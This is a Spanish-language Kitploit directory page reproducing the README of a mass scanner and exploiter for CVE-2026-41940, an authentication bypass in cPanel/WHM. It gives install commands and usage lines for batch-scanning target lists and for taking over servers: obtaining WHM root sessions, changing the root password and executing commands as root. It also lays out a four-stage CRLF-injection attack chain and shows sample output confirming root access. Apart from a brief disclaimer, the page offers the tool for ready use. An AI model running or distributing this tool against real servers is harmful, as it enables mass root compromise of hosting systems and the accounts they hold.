Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - Escáner y explotador masivo | Kitploit
Herramientas/GitHubGitHub/lutfifakee-project/cve-2026-41940
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónComando y ControlAutenticaciónRed TeamingDesarrollo de Payloads
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - Escáner y explotador masivo

2hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver RepositorioSitio web

CVE-2026-41940 - Escáner y Herramienta de Explotación de Bypass de Autenticación de cPanel/WHM

Python License Security Tested on

Escáner y Herramienta de Explotación de Bypass de Autenticación de cPanel/WHM para CVE-2026-41940


⚠️ Aviso Legal

Esta herramienta se proporciona únicamente con fines educativos y para pruebas de seguridad autorizadas.

Al usar esta herramienta, aceptas que:

  • Solo probarás sistemas que poseas o para los que tengas permiso explícito por escrito.
  • Entiendes que el acceso no autorizado a sistemas informáticos es ilegal.
  • Eres el único responsable de tus acciones mientras usas esta herramienta.
  • No puedes redistribuir, modificar ni atribuirte esta herramienta como propia.

❗ El autor NO es responsable de ningún uso indebido, actividad ilegal, daño o consecuencia legal derivado del uso de esta herramienta.


🎯 Descripción General

CVE-2026-41940 es una vulnerabilidad crítica de bypass de autenticación en cPanel/WHM que podría permitir a los atacantes obtener acceso root no autorizado sin credenciales válidas.

Esta herramienta ofrece una implementación en Python para:

  • Detectar objetivos vulnerables
  • Automatizar la explotación (para pruebas autorizadas)
  • Realizar escaneos a gran escala

🔥 Cadena de Ataque en 4 Etapas


✨ Características


📋 Requisitos

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 Instalación

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 Uso

Comandos Básicos

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 Formato del Archivo de Objetivos (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ Parámetros


📊 Ejemplo de Salida

Escaneo por Lotes

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

Generación de URL de Sesión

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ Detalles de la Vulnerabilidad

CampoValor
CVECVE-2026-41940
SeveridadCrítica (CVSS 9.8)
Vector de AtaqueRed
Privilegios Requeridos

Versiones Afectadas

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ Notas Importantes

  • Úsala solo en sistemas autorizados
  • Los tokens de sesión caducan rápidamente
  • El RCE puede fallar en licencias restringidas
  • Algunos objetivos requieren -hostname
  • Todo el tráfico usa HTTPS

🧪 Entorno de Pruebas

Para pruebas seguras y legales:

  • Usa tu propio VPS/servidor
  • Configura un entorno de laboratorio vulnerable
  • Obtén siempre permiso por escrito

⭐ Soporte

Si este proyecto te fue útil, considera darle una ⭐

Descargar herramienta
EtapaDescripción
1. Pre-autenticaciónEnviar credenciales no válidas a /login/ para obtener la cookie whostmgrsession
2. Inyección CRLFInyectar una nueva línea mediante la cabecera Authorization: Basic para filtrar el token cpsess
3. Propagación del tokenActivar do_token_denied para propagar el token en la caché
4. VerificaciónAcceder a /json-api/version para confirmar el acceso root de WHM
CaracterísticaDescripción
🔄 Escaneo por lotesEscanear múltiples objetivos simultáneamente
🎯 Objetivo únicoEscanear un objetivo individual con salida detallada
🔌 Escaneo de puertosEscaneo automático de puertos WHM (2082, 2083, 2086, 2087)
🔓 URL de sesiónGenerar URL de inicio de sesión WHM de un clic
💀 RCEEjecutar comandos del sistema como root
🔑 Cambiar contraseñaModificar la contraseña root de WHM
📡 Llamadas a la API de WHMLlamar a funciones de la API de WHM
🎨 Salida con coloresSalida visual para los resultados
💾 Exportar resultadosGuardar objetivos vulnerables en un archivo
ParámetroDescripciónEjemplo
-uURL de un solo objetivo-u https://target.com:2087
-fArchivo de lista de objetivos-f targets.txt
-cConcurrencia (hilos)-c 20
-oArchivo de salida-o results.txt
-hostnameCabecera Host personalizada-hostname cpanel.target.com
--scan-portsEscanear todos los puertos WHM--scan-ports
-sessionGenerar URL de inicio de sesión-session
-passwdCambiar contraseña root-passwd "NewPass123"
-cmdEjecutar comando-cmd "id"
-keepMantener cuenta temporal-keep
-apiLlamar a la API de WHM-api listaccts
-api-paramsParámetros de la API-api-params "user=root,password=123"
Ninguno
Interacción del UsuarioNinguna